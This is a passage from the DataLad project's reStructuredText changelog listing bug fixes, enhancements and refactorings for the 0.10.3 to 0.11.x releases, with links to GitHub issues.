<https://github.com/datalad/datalad/issues/3626>`__)\n\n- `siblings <http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html>`__\n now displays an informative error message if a local path is given to\n ``--url`` but ``--name`` isn’t specified.\n (`#3555 <https://github.com/datalad/datalad/issues/3555>`__)\n\n- `sshrun <http://datalad.readthedocs.io/en/latest/generated/man/datalad-sshrun.html>`__,\n the command DataLad uses for ``GIT_SSH_COMMAND``, didn’t support all\n the parameters that Git expects it to.\n (`#3616 <https://github.com/datalad/datalad/issues/3616>`__)\n\n- Fixed a number of Unicode py2-compatibility issues.\n (`#3597 <https://github.com/datalad/datalad/issues/3597>`__)\n\n- `download-url <https://datalad.readthedocs.io/en/latest/generated/man/datalad-download-url.html>`__\n now will create leading directories of the output path if they do not\n exist (`#3646 <https://github.com/datalad/datalad/issues/3646>`__)\n\n.. 
_enhancements-and-new-features-27:\n\nEnhancements and new features\n-----------------------------\n\n- The\n `annotate-paths <http://docs.datalad.org/en/latest/generated/man/datalad-annotate-paths.html>`__\n helper now caches subdatasets it has seen to avoid unnecessary calls.\n (`#3570 <https://github.com/datalad/datalad/issues/3570>`__)\n\n- A repeated configuration query has been dropped from the handling of\n ``--proc-pre`` and ``--proc-post``.\n (`#3576 <https://github.com/datalad/datalad/issues/3576>`__)\n\n- Calls to ``git annex find`` now use ``--in=.`` instead of the alias\n ``--in=here`` to take advantage of an optimization that git-annex (as\n of the current release, 7.20190730) applies only to the former.\n (`#3574 <https://github.com/datalad/datalad/issues/3574>`__)\n\n- `addurls <http://datalad.readthedocs.io/en/latest/generated/man/datalad-addurls.html>`__\n now suggests close matches when the URL or file format contains an\n unknown field.\n (`#3594 <https://github.com/datalad/datalad/issues/3594>`__)\n\n- Shared logic used in the setup.py files of DataLad and its extensions\n has been moved to modules in the \\_datalad_build_support/ directory.\n (`#3600 <https://github.com/datalad/datalad/issues/3600>`__)\n\n- Get ready for upcoming git-annex dropping support for direct mode\n (`#3631 <https://github.com/datalad/datalad/issues/3631>`__)\n\n0.11.6 (Jul 30, 2019) – am I the last of 0.11.x?\n================================================\n\nPrimarily bug fixes to achieve more robust performance\n\n.. _fixes-28:\n\nFixes\n-----\n\n- Our tests needed various adjustments to keep up with upstream changes\n in Travis and Git.\n (`#3479 <https://github.com/datalad/datalad/issues/3479>`__)\n (`#3492 <https://github.com/datalad/datalad/issues/3492>`__)\n (`#3493 <https://github.com/datalad/datalad/issues/3493>`__)\n\n- ``AnnexRepo.is_special_annex_remote`` was too selective in what it\n considered to be a special remote.\n (`#3499 <https://github.com/datalad/datalad/issues/3499>`__)\n\n- We now provide information about unexpected output when git-annex is\n called with ``--json``.\n (`#3516 <https://github.com/datalad/datalad/issues/3516>`__)\n\n- Exception logging in the ``__del__`` method of ``GitRepo`` and\n ``AnnexRepo`` no longer fails if the names it needs are no longer\n bound. (`#3527 <https://github.com/datalad/datalad/issues/3527>`__)\n\n- `addurls <http://datalad.readthedocs.io/en/latest/generated/man/datalad-addurls.html>`__\n botched the construction of subdataset paths that were more than two\n levels deep and failed to create datasets in a reliable,\n breadth-first order.\n (`#3561 <https://github.com/datalad/datalad/issues/3561>`__)\n\n- Cloning a ``type=git`` special remote showed a spurious warning about\n the remote not being enabled.\n (`#3547 <https://github.com/datalad/datalad/issues/3547>`__)\n\n.. 
_enhancements-and-new-features-28:\n\nEnhancements and new features\n-----------------------------\n\n- For calls to git and git-annex, we disable automatic garbage\n collection due to past issues with GitPython’s state becoming stale,\n but doing so results in a larger .git/objects/ directory that isn’t\n cleaned up until garbage collection is triggered outside of DataLad.\n Tests with the latest GitPython didn’t reveal any state issues, so\n we’ve re-enabled automatic garbage collection.\n (`#3458 <https://github.com/datalad/datalad/issues/3458>`__)\n\n- `rerun <https://datalad.readthedocs.io/en/latest/generated/man/datalad-rerun.html>`__\n learned an ``--explicit`` flag, which it relays to its calls to\n [run][[]]. This makes it possible to call ``rerun`` in a dirty\n working tree\n (`#3498 <https://github.com/datalad/datalad/issues/3498>`__).\n\n- The\n `metadata <http://datalad.readthedocs.io/en/latest/generated/man/datalad-metadata.html>`__\n command aborts earlier if a metadata extractor is unavailable.\n (`#3525 <https://github.com/datalad/datalad/issues/3525>`__)\n\n0.11.5 (May 23, 2019) – stability is not overrated\n==================================================\n\nShould be faster and less buggy, with a few enhancements.\n\n.. _fixes-29:\n\nFixes\n-----\n\n- `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__\n (`#3318 <https://github.com/datalad/datalad/issues/3318>`__)\n\n - Siblings are no longer configured with a post-update hook unless a\n web interface is requested with ``--ui``.\n - ``git submodule update --init`` is no longer called from the\n post-update hook.\n - If ``--inherit`` is given for a dataset without a superdataset, a\n warning is now given instead of raising an error.\n\n- The internal command runner failed on Python 2 when its ``env``\n argument had unicode values.\n (`#3332 <https://github.com/datalad/datalad/issues/3332>`__)\n- The safeguard that prevents creating a dataset in a subdirectory that\n already contains tracked files for another repository failed on Git\n versions before 2.14. For older Git versions, we now warn the caller\n that the safeguard is not active.\n (`#3347 <https://github.com/datalad/datalad/issues/3347>`__)\n- A regression introduced in v0.11.1 prevented\n `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n from committing changes under a subdirectory when the subdirectory\n was specified as a path argument.\n (`#3106 <https://github.com/datalad/datalad/issues/3106>`__)\n- A workaround introduced in v0.11.1 made it possible for\n `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__\n to do a partial commit with an annex file that has gone below the\n ``annex.largefiles`` threshold. The logic of this workaround was\n faulty, leading to files being displayed as typechanged in the index\n following the commit.\n (`#3365 <https://github.com/datalad/datalad/issues/3365>`__)\n- The resolve_path() helper confused paths that had a semicolon for SSH\n RIs. (`#3425 <https://github.com/datalad/datalad/issues/3425>`__)\n- The detection of SSH RIs has been improved.\n (`#3425 <https://github.com/datalad/datalad/issues/3425>`__)\n\n.. _enhancements-and-new-features-29:\n\nEnhancements and new features\n-----------------------------\n\n- The internal command runner was too aggressive in its decision to\n sleep. 
(`#3322 <https://github.com/datalad/datalad/issues/3322>`__)\n- The “INFO” label in log messages now retains the default text color\n for the terminal rather than using white, which only worked well for\n terminals with dark backgrounds.\n (`#3334 <https://github.com/datalad/datalad/issues/3334>`__)\n- A short flag ``-R`` is now available for the ``--recursion-limit``\n flag, a flag shared by several subcommands.\n (`#3340 <https://github.com/datalad/datalad/issues/3340>`__)\n- The authentication logic for\n `create-sibling-github <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-github.html>`__\n has been revamped and now supports 2FA.\n (`#3180 <https://github.com/datalad/datalad/issues/3180>`__)\n- New configuration option ``datalad.ui.progressbar`` can be used to\n configure the default backend for progress reporting (“none”, for\n example, results in no progress bars being shown).\n (`#3396 <https://github.com/datalad/datalad/issues/3396>`__)\n- A new progress backend, available by setting datalad.ui.progressbar\n to “log”, replaces progress bars with a log message upon completion\n of an action.\n (`#3396 <https://github.com/datalad/datalad/issues/3396>`__)\n- DataLad learned to consult the `NO_COLOR <https://no-color.org/>`__\n environment variable and the new ``datalad.ui.color`` configuration\n option when deciding to color output. The default value, “auto”,\n retains the current behavior of coloring output if attached to a TTY\n (`#3407 <https://github.com/datalad/datalad/issues/3407>`__).\n- `clean <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clean.html>`__\n now removes annex transfer directories, which is useful for cleaning\n up failed downloads.\n (`#3374 <https://github.com/datalad/datalad/issues/3374>`__)\n- `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n no longer refuses to clone into a local path that looks like a URL,\n making its behavior consistent with ``git clone``.\n (`#3425 <https://github.com/datalad/datalad/issues/3425>`__)\n- `wtf <http://datalad.readthedocs.io/en/latest/generated/man/datalad-wtf.html>`__\n\n - Learned to fall back to the ``dist`` package if ``platform.dist``,\n which has been removed in the yet-to-be-release Python 3.8, does\n not exist.\n (`#3439 <https://github.com/datalad/datalad/issues/3439>`__)\n - Gained a ``--section`` option for limiting the output to specific\n sections and a ``--decor`` option, which currently knows how to\n format the output as GitHub’s ``<details>`` section.\n (`#3440 <https://github.com/datalad/datalad/issues/3440>`__)\n\n0.11.4 (Mar 18, 2019) – get-ready\n=================================\n\nLargely a bug fix release with a few enhancements\n\nImportant\n---------\n\n- 0.11.x series will be the last one with support for direct mode of\n `git-annex <http://git-annex.branchable.com/>`__ which is used on\n crippled (no symlinks and no locking) filesystems. v7 repositories\n should be used instead.\n\n.. _fixes-30:\n\nFixes\n-----\n\n- Extraction of .gz files is broken without p7zip installed. 
We now\n abort with an informative error in this situation.\n (`#3176 <https://github.com/datalad/datalad/issues/3176>`__)\n\n- Committing failed in some cases because we didn’t ensure that the\n path passed to ``git read-tree --index-output=...`` resided on the\n same filesystem as the repository.\n (`#3181 <https://github.com/datalad/datalad/issues/3181>`__)\n\n- Some pointless warnings during metadata aggregation have been\n eliminated.\n (`#3186 <https://github.com/datalad/datalad/issues/3186>`__)\n\n- With Python 3 the LORIS token authenticator did not properly decode a\n response\n (`#3205 <https://github.com/datalad/datalad/issues/3205>`__).\n\n- With Python 3 downloaders unnecessarily decoded the response when\n getting the status, leading to an encoding error.\n (`#3210 <https://github.com/datalad/datalad/issues/3210>`__)\n\n- In some cases, our internal command Runner did not adjust the\n environment’s ``PWD`` to match the current working directory\n specified with the ``cwd`` parameter.\n (`#3215 <https://github.com/datalad/datalad/issues/3215>`__)\n\n- The specification of the pyliblzma dependency was broken.\n (`#3220 <https://github.com/datalad/datalad/issues/3220>`__)\n\n- `search <http://datalad.readthedocs.io/en/latest/generated/man/datalad-search.html>`__\n displayed an uninformative blank log message in some cases.\n (`#3222 <https://github.com/datalad/datalad/issues/3222>`__)\n\n- The logic for finding the location of the aggregate metadata DB\n anchored the search path incorrectly, leading to a spurious warning.\n (`#3241 <https://github.com/datalad/datalad/issues/3241>`__)\n\n- Some progress bars were still displayed when stdout and stderr were\n not attached to a tty.\n (`#3281 <https://github.com/datalad/datalad/issues/3281>`__)\n\n- Check for stdin/out/err to not be closed before checking for\n ``.isatty``.\n (`#3268 <https://github.com/datalad/datalad/issues/3268>`__)\n\n.. _enhancements-and-new-features-30:\n\nEnhancements and new features\n-----------------------------\n\n- Creating a new repository now aborts if any of the files in the\n directory are tracked by a repository in a parent directory.\n (`#3211 <https://github.com/datalad/datalad/issues/3211>`__)\n\n- `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__\n learned to replace the ``{tmpdir}`` placeholder in commands with a\n temporary directory.\n (`#3223 <https://github.com/datalad/datalad/issues/3223>`__)\n\n- `duecredit <https://github.com/duecredit/duecredit>`__ support has\n been added for citing DataLad itself as well as datasets that an\n analysis uses.\n (`#3184 <https://github.com/datalad/datalad/issues/3184>`__)\n\n- The ``eval_results`` interface helper unintentionally modified one of\n its arguments.\n (`#3249 <https://github.com/datalad/datalad/issues/3249>`__)\n\n- A few DataLad constants have been added, changed, or renamed\n (`#3250 <https://github.com/datalad/datalad/issues/3250>`__):\n\n - ``HANDLE_META_DIR`` is now ``DATALAD_DOTDIR``. 
The old name should\n be considered deprecated.\n - ``METADATA_DIR`` now refers to ``DATALAD_DOTDIR/metadata`` rather\n than ``DATALAD_DOTDIR/meta`` (which is still available as\n ``OLDMETADATA_DIR``).\n - The new ``DATASET_METADATA_FILE`` refers to\n ``METADATA_DIR/dataset.json``.\n - The new ``DATASET_CONFIG_FILE`` refers to\n ``DATALAD_DOTDIR/config``.\n - ``METADATA_FILENAME`` has been renamed to\n ``OLDMETADATA_FILENAME``.\n\n0.11.3 (Feb 19, 2019) – read-me-gently\n======================================\n\nJust a few of important fixes and minor enhancements.\n\n.. _fixes-31:\n\nFixes\n-----\n\n- The logic for setting the maximum command line length now works\n around Python 3.4 returning an unreasonably high value for\n ``SC_ARG_MAX`` on Debian systems.\n (`#3165 <https://github.com/datalad/datalad/issues/3165>`__)\n\n- DataLad commands that are conceptually “read-only”, such as\n ``datalad ls -L``, can fail when the caller lacks write permissions\n because git-annex tries merging remote git-annex branches to update\n information about availability. DataLad now disables\n ``annex.merge-annex-branches`` in some common “read-only” scenarios\n to avoid these failures.\n (`#3164 <https://github.com/datalad/datalad/issues/3164>`__)\n\n.. _enhancements-and-new-features-31:\n\nEnhancements and new features\n-----------------------------\n\n- Accessing an “unbound” dataset method now automatically imports the\n necessary module rather than requiring an explicit import from the\n Python caller. For example, calling ``Dataset.add`` no longer needs\n to be preceded by ``from datalad.distribution.add import Add`` or an\n import of ``datalad.api``.\n (`#3156 <https://github.com/datalad/datalad/issues/3156>`__)\n\n- Configuring the new variable ``datalad.ssh.identityfile`` instructs\n DataLad to pass a value to the ``-i`` option of ``ssh``.\n (`#3149 <https://github.com/datalad/datalad/issues/3149>`__)\n (`#3168 <https://github.com/datalad/datalad/issues/3168>`__)\n\n0.11.2 (Feb 07, 2019) – live-long-and-prosper\n=============================================\n\nA variety of bugfixes and enhancements\n\n.. _major-refactoring-and-deprecations-10:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- All extracted metadata is now placed under git-annex by default.\n Previously files smaller than 20 kb were stored in git.\n (`#3109 <https://github.com/datalad/datalad/issues/3109>`__)\n- The function ``datalad.cmd.get_runner`` has been removed.\n (`#3104 <https://github.com/datalad/datalad/issues/3104>`__)\n\n.. _fixes-32:\n\nFixes\n-----\n\n- Improved handling of long commands:\n\n - The code that inspected ``SC_ARG_MAX`` didn’t check that the\n reported value was a sensible, positive number.\n (`#3025 <https://github.com/datalad/datalad/issues/3025>`__)\n - More commands that invoke ``git`` and ``git-annex`` with file\n arguments learned to split up the command calls when it is likely\n that the command would fail due to exceeding the maximum supported\n length.\n (`#3138 <https://github.com/datalad/datalad/issues/3138>`__)\n\n- The ``setup_yoda_dataset`` procedure created a malformed\n .gitattributes line.\n (`#3057 <https://github.com/datalad/datalad/issues/3057>`__)\n- `download-url <https://datalad.readthedocs.io/en/latest/generated/man/datalad-download-url.html>`__\n unnecessarily tried to infer the dataset when ``--no-save`` was\n given. 
(`#3029 <https://github.com/datalad/datalad/issues/3029>`__)\n- `rerun <https://datalad.readthedocs.io/en/latest/generated/man/datalad-rerun.html>`__\n aborted too late and with a confusing message when a ref specified\n via ``--onto`` didn’t exist.\n (`#3019 <https://github.com/datalad/datalad/issues/3019>`__)\n- `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__:\n\n - ``run`` didn’t preserve the current directory prefix (“./”) on\n inputs and outputs, which is problematic if the caller relies on\n this representation when formatting the command.\n (`#3037 <https://github.com/datalad/datalad/issues/3037>`__)\n - Fixed a number of unicode py2-compatibility issues.\n (`#3035 <https://github.com/datalad/datalad/issues/3035>`__)\n (`#3046 <https://github.com/datalad/datalad/issues/3046>`__)\n - To proceed with a failed command, the user was confusingly\n instructed to use ``save`` instead of ``add`` even though ``run``\n uses ``add`` underneath.\n (`#3080 <https://github.com/datalad/datalad/issues/3080>`__)\n\n- Fixed a case where the helper class for checking external modules\n incorrectly reported a module as unknown.\n (`#3051 <https://github.com/datalad/datalad/issues/3051>`__)\n- `add-archive-content <https://datalad.readthedocs.io/en/latest/generated/man/datalad-add-archive-content.html>`__\n mishandled the archive path when the leading path contained a\n symlink. (`#3058 <https://github.com/datalad/datalad/issues/3058>`__)\n- Following denied access, the credential code failed to consider a\n scenario, leading to a type error rather than an appropriate error\n message. (`#3091 <https://github.com/datalad/datalad/issues/3091>`__)\n- Some tests failed when executed from a ``git worktree`` checkout of\n the source repository.\n (`#3129 <https://github.com/datalad/datalad/issues/3129>`__)\n- During metadata extraction, batched annex processes weren’t properly\n terminated, leading to issues on Windows.\n (`#3137 <https://github.com/datalad/datalad/issues/3137>`__)\n- `add <http://datalad.readthedocs.io/en/latest/generated/man/datalad-add.html>`__\n incorrectly handled an “invalid repository” exception when trying to\n add a submodule.\n (`#3141 <https://github.com/datalad/datalad/issues/3141>`__)\n- Pass ``GIT_SSH_VARIANT=ssh`` to git processes to be able to specify\n alternative ports in SSH urls\n\n.. _enhancements-and-new-features-32:\n\nEnhancements and new features\n-----------------------------\n\n- `search <http://datalad.readthedocs.io/en/latest/generated/man/datalad-search.html>`__\n learned to suggest closely matching keys if there are no hits.\n (`#3089 <https://github.com/datalad/datalad/issues/3089>`__)\n- `create-sibling <http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html>`__\n\n - gained a ``--group`` option so that the caller can specify the\n file system group for the repository.\n (`#3098 <https://github.com/datalad/datalad/issues/3098>`__)\n - now understands SSH URLs that have a port in them (i.e. 
the\n “ssh://[user@]host.xz[:port]/path/to/repo.git/” syntax mentioned\n in ``man git-fetch``).\n (`#3146 <https://github.com/datalad/datalad/issues/3146>`__)\n\n- Interface classes can now override the default renderer for\n summarizing results.\n (`#3061 <https://github.com/datalad/datalad/issues/3061>`__)\n- `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__:\n\n - ``--input`` and ``--output`` can now be shortened to ``-i`` and\n ``-o``.\n (`#3066 <https://github.com/datalad/datalad/issues/3066>`__)\n - Placeholders such as “{inputs}” are now expanded in the command\n that is shown in the commit message subject.\n (`#3065 <https://github.com/datalad/datalad/issues/3065>`__)\n - ``interface.run.run_command`` gained an ``extra_inputs`` argument\n so that wrappers like\n `datalad-container <https://github.com/datalad/datalad-container>`__\n can specify additional inputs that aren’t considered when\n formatting the command string.\n (`#3038 <https://github.com/datalad/datalad/issues/3038>`__)\n - “–” can now be used to separate options for ``run`` and those for\n the command in ambiguous cases.\n (`#3119 <https://github.com/datalad/datalad/issues/3119>`__)\n\n- The utilities ``create_tree`` and ``ok_file_has_content`` now support\n “.gz” files.\n (`#3049 <https://github.com/datalad/datalad/issues/3049>`__)\n- The Singularity container for 0.11.1 now uses\n `nd_freeze <https://github.com/neurodebian/neurodebian/blob/master/tools/nd_freeze>`__\n to make its builds reproducible.\n- A\n `publications <https://datalad.readthedocs.io/en/latest/publications.html>`__\n page has been added to the documentation.\n (`#3099 <https://github.com/datalad/datalad/issues/3099>`__)\n- ``GitRepo.set_gitattributes`` now accepts a ``mode`` argument that\n controls whether the .gitattributes file is appended to (default) or\n overwritten.\n (`#3115 <https://github.com/datalad/datalad/issues/3115>`__)\n- ``datalad --help`` now avoids using ``man`` so that the list of\n subcommands is shown.\n (`#3124 <https://github.com/datalad/datalad/issues/3124>`__)\n\n0.11.1 (Nov 26, 2018) – v7-better-than-v6\n=========================================\n\nRushed out bugfix release to stay fully compatible with recent\n`git-annex <http://git-annex.branchable.com/>`__ which introduced v7 to\nreplace v6.\n\n.. _fixes-33:\n\nFixes\n-----\n\n- `install <http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html>`__:\n be able to install recursively into a dataset\n (`#2982 <https://github.com/datalad/datalad/issues/2982>`__)\n- `save <http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html>`__:\n be able to commit/save changes whenever files potentially could have\n swapped their storage between git and annex\n (`#1651 <https://github.com/datalad/datalad/issues/1651>`__)\n (`#2752 <https://github.com/datalad/datalad/issues/2752>`__)\n (`#3009 <https://github.com/datalad/datalad/issues/3009>`__)\n- [aggregate-metadata][]:\n\n - dataset’s itself is now not “aggregated” if specific paths are\n provided for aggregation\n (`#3002 <https://github.com/datalad/datalad/issues/3002>`__). 
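A hedged illustration of the ``run`` input/output declarations from the 0.11.2 entries above; the dataset path, file names, and command are made up, and the relative paths are assumed to live inside an already existing dataset::

   import datalad.api as dl

   ds_path = '/tmp/demo-ds'                  # hypothetical existing dataset
   dl.run(
       'wc -l {inputs} > {outputs}',         # placeholders are expanded by DataLad
       dataset=ds_path,
       inputs=['raw/table.csv'],             # Python counterpart of repeated -i/--input
       outputs=['derived/linecount.txt'],    # counterpart of -o/--output
       message='count lines in the raw table',
   )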
That\n resolves the issue of ``-r`` invocation aggregating all\n subdatasets of the specified dataset as well\n - also compare/verify the actual content checksum of aggregated\n metadata while considering subdataset metadata for re-aggregation\n (`#3007 <https://github.com/datalad/datalad/issues/3007>`__)\n\n- ``annex`` commands are now chunked assuming 50% “safety margin” on\n the maximal command line length. Should resolve crashes while\n operating of too many files at ones\n (`#3001 <https://github.com/datalad/datalad/issues/3001>`__)\n- ``run`` sidecar config processing\n (`#2991 <https://github.com/datalad/datalad/issues/2991>`__)\n- no double trailing period in docs\n (`#2984 <https://github.com/datalad/datalad/issues/2984>`__)\n- correct identification of the repository with symlinks in the paths\n in the tests\n (`#2972 <https://github.com/datalad/datalad/issues/2972>`__)\n- re-evaluation of dataset properties in case of dataset changes\n (`#2946 <https://github.com/datalad/datalad/issues/2946>`__)\n- [text2git][] procedure to use ``ds.repo.set_gitattributes``\n (`#2974 <https://github.com/datalad/datalad/issues/2974>`__)\n (`#2954 <https://github.com/datalad/datalad/issues/2954>`__)\n- Switch to use plain ``os.getcwd()`` if inconsistency with env var\n ``$PWD`` is detected\n (`#2914 <https://github.com/datalad/datalad/issues/2914>`__)\n- Make sure that credential defined in env var takes precedence\n (`#2960 <https://github.com/datalad/datalad/issues/2960>`__)\n (`#2950 <https://github.com/datalad/datalad/issues/2950>`__)\n\n.. _enhancements-and-new-features-33:\n\nEnhancements and new features\n-----------------------------\n\n- `shub://datalad/datalad:git-annex-dev <https://singularity-hub.org/containers/5663/view>`__\n provides a Debian buster Singularity image with build environment for\n `git-annex <http://git-annex.branchable.com/>`__.\n ``tools/bisect-git-annex`` provides a helper for running\n ``git bisect`` on git-annex using that Singularity container\n (`#2995 <https://github.com/datalad/datalad/issues/2995>`__)\n- Added ``.zenodo.json`` for better integration with Zenodo for\n citation\n- `run-procedure <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html>`__\n now provides names and help messages with a custom renderer for\n (`#2993 <https://github.com/datalad/datalad/issues/2993>`__)\n- Documentation: point to\n `datalad-revolution <http://github.com/datalad/datalad-revolution>`__\n extension (prototype of the greater DataLad future)\n- `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__\n\n - support injecting of a detached command\n (`#2937 <https://github.com/datalad/datalad/issues/2937>`__)\n\n- ``annex`` metadata extractor now extracts ``annex.key`` metadata\n record. Should allow now to identify uses of specific files etc\n (`#2952 <https://github.com/datalad/datalad/issues/2952>`__)\n- Test that we can install from http://datasets.datalad.org\n- Proper rendering of ``CommandError`` (e.g. in case of “out of space”\n error) (`#2958 <https://github.com/datalad/datalad/issues/2958>`__)\n\n0.11.0 (Oct 23, 2018) – Soon-to-be-perfect\n==========================================\n\n`git-annex <http://git-annex.branchable.com/>`__ 6.20180913 (or later)\nis now required - provides a number of fixes for v6 mode operations etc.\n\n.. 
_major-refactoring-and-deprecations-11:\n\nMajor refactoring and deprecations\n----------------------------------\n\n- ``datalad.consts.LOCAL_CENTRAL_PATH`` constant was deprecated in\n favor of ``datalad.locations.default-dataset``\n `configuration <http://docs.datalad.org/en/latest/config.html>`__\n variable (`#2835 <https://github.com/datalad/datalad/issues/2835>`__)\n\nMinor refactoring\n-----------------\n\n- ``\"notneeded\"`` messages are no longer reported by default results\n renderer\n- `run <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html>`__\n no longer shows commit instructions upon command failure when\n ``explicit`` is true and no outputs are specified\n (`#2922 <https://github.com/datalad/datalad/issues/2922>`__)\n- ``get_git_dir`` moved into GitRepo\n (`#2886 <https://github.com/datalad/datalad/issues/2886>`__)\n- ``_gitpy_custom_call`` removed from GitRepo\n (`#2894 <https://github.com/datalad/datalad/issues/2894>`__)\n- ``GitRepo.get_merge_base`` argument is now called ``commitishes``\n instead of ``treeishes``\n (`#2903 <https://github.com/datalad/datalad/issues/2903>`__)\n\n.. _fixes-34:\n\nFixes\n-----\n\n- `update <http://datalad.readthedocs.io/en/latest/generated/man/datalad-update.html>`__\n should not leave the dataset in non-clean state\n (`#2858 <https://github.com/datalad/datalad/issues/2858>`__) and some\n other enhancements\n (`#2859 <https://github.com/datalad/datalad/issues/2859>`__)\n- Fixed chunking of the long command lines to account for decorators\n and other arguments\n (`#2864 <https://github.com/datalad/datalad/issues/2864>`__)\n- Progress bar should not crash the process on some missing progress\n information\n (`#2891 <https://github.com/datalad/datalad/issues/2891>`__)\n- Default value for ``jobs`` set to be ``\"auto\"`` (not ``None``) to\n take advantage of possible parallel get if in ``-g`` mode\n (`#2861 <https://github.com/datalad/datalad/issues/2861>`__)\n- `wtf <http://datalad.readthedocs.io/en/latest/generated/man/datalad-wtf.html>`__\n must not crash if ``git-annex`` is not installed etc\n (`#2865 <https://github.com/datalad/datalad/issues/2865>`__),\n (`#2865 <https://github.com/datalad/datalad/issues/2865>`__),\n (`#2918 <https://github.com/datalad/datalad/issues/2918>`__),\n (`#2917 <https://github.com/datalad/datalad/issues/2917>`__)\n- Fixed paths (with spaces etc) handling while reporting annex error\n output (`#2892 <https://github.com/datalad/datalad/issues/2892>`__),\n (`#2893 <https://github.com/datalad/datalad/issues/2893>`__)\n- ``__del__`` should not access ``.repo`` but ``._repo`` to avoid\n attempts for reinstantiation etc\n (`#2901 <https://github.com/datalad/datalad/issues/2901>`__)\n- Fix up submodule ``.git`` right in ``GitRepo.add_submodule`` to avoid\n added submodules being non git-annex friendly\n (`#2909 <https://github.com/datalad/datalad/issues/2909>`__),\n (`#2904 <https://github.com/datalad/datalad/issues/2904>`__)\n- `run-procedure <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html>`__\n (`#2905 <https://github.com/datalad/datalad/issues/2905>`__)\n\n - now will provide dataset into the procedure if called within\n dataset\n - will not crash if procedure is an executable without ``.py`` or\n ``.sh`` suffixes\n\n- Use centralized ``.gitattributes`` handling while setting annex\n backend (`#2912 <https://github.com/datalad/datalad/issues/2912>`__)\n- ``GlobbedPaths.expand(..., full=True)`` incorrectly returned relative\n paths when called more than once\n 
(`#2921 <https://github.com/datalad/datalad/issues/2921>`__)\n\n.. _enhancements-and-new-features-34:\n\nEnhancements and new features\n-----------------------------\n\n- Report progress on\n `clone <http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html>`__\n when installing from “smart” git servers\n (`#2876 <https://github.com/datalad/datalad/issues/2876>`__)\n- Stale/unused ``sth_like_file_has_content`` was removed\n (`#2860 <https://github.com/datalad/datalad/issues/2860>`__)\n- Enhancements to\n `search <http://datalad.readthedocs.io/en/latest/generated/man/datalad-search.html>`__\n to operate on “improved” metadata layouts\n (`#2878 <https://github.com/datalad/datalad/issues/2878>`__)\n- Output of ``git annex init`` operation is now logged\n (`#2881 <https://github.com/datalad/datalad/issues/2881>`__)\n- New\n\n - ``GitRepo.cherry_pick``\n (`#2900 <https://github.com/datalad/datalad/issues/2900>`__)\n - ``GitRepo.format_commit``\n (`#2902 <https://github.com/datalad/datalad/issues/2902>`__)\n\n- `run-procedure <http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html>`__\n (`#2905 <https://github.com/datalad/datalad/issues/2905>`__)\n\n - procedures can now recursively be discovered in subdatasets as\n well. The uppermost has highest priority\n - Procedures in user and system locations now take precedence over\n those in datasets.\n\n0.10.3.1 (Sep 13, 2018) – Nothing-is-perfect\n============================================\n\nEmergency bugfix to address forgotten boost of version in\n``datalad/version.py``.\n\n0.10.3 (Sep 13, 2018) – Almost-perfect\n======================================\n\nThis is largely a bugfix release which addressed many (but not yet all)\nissues of working with git-annex direct and version 6 modes, and\noperation on Windows in general. Among enhancements you will see the\nsupport of public S3 buckets (even with periods in their names), ability\nto configure new providers interactively, and improved ``egrep`` search\nbackend.\n\nAlthough we do not require with this release, it is recommended to make\nsure that you are using a recent ``git-annex`` since it also had a\nvariety of fixes and enhancements in the past months.\n\n.. _fixes-35:\n\nFixes\n-----\n\n- Parsing of combined short options has been broken since DataLad\n v0.10.0. 
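For orientation only, a small sketch of the ``GitRepo.format_commit`` helper listed above; the repository path and the pretty-format string are invented, and the exact signature may differ between DataLad versions::

   from datalad.support.gitrepo import GitRepo

   repo = GitRepo('/tmp/demo-ds')            # hypothetical existing repository
   # describe HEAD with a git pretty-format string (hash, committer date, subject)
   print(repo.format_commit('%H %cI %s'))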
(`#2710 <https://github.com/datalad/datalad/issues/2710>`__)\n- The ``datalad save`` instructions shown by ``datalad run`` for a\n command with a non-zero exit were incorrectly formatted.\n (`#2692 <https://github.com/datalad/datalad/issues/2692>`__)\n- Decompression of zip files (e.g., through\n ``datalad add-archive-content``) failed on Python 3.\n (`#2702 <https://github.com/datalad/datalad/issues/2702>`__)\n- Windows:\n\n - colored log output was not being processed by colorama.\n (`#2707 <https://github.com/datalad/datalad/issues/2707>`__)\n - more codepaths now try multiple times when removing a file to deal\n with latency and locking issues on Windows.\n (`#2795 <https://github.com/datalad/datalad/issues/2795>`__)\n\n- Internal git fetch calls have been updated to work around a GitPython\n ``BadName`` issue.\n (`#2712 <https://github.com/datalad/datalad/issues/2712>`__),\n (`#2794 <https://github.com/datalad/datalad/issues/2794>`__)\n- The progress bar for annex file transferring was unable to handle an\n empty file.\n (`#2717 <https://github.com/datalad/datalad/issues/2717>`__)\n- ``datalad add-readme`` halted when no aggregated metadata was found\n rather than displaying a warning.\n (`#2731 <https://github.com/datalad/datalad/issues/2731>`__)\n- ``datalad rerun`` failed if ``--onto`` was specified and the history\n contained no run commits.\n (`#2761 <https://github.com/datalad/datalad/issues/2761>`__)\n- Processing of a command’s results failed on a result record with a\n missing value (e.g., absent field or subfield in metadata). Now the\n missing value is rendered as “N/A”.\n (`#2725 <https://github.com/datalad/datalad/issues/2725>`__).\n- A couple of documentation links in the “Delineation from related\n solutions” were misformatted.\n (`#2773 <https://github.com/datalad/datalad/issues/2773>`__)\n- With the latest git-annex, several known V6 failures are no longer an\n issue. (`#2777 <https://github.com/datalad/datalad/issues/2777>`__)\n- In direct mode, commit changes would often commit annexed content as\n 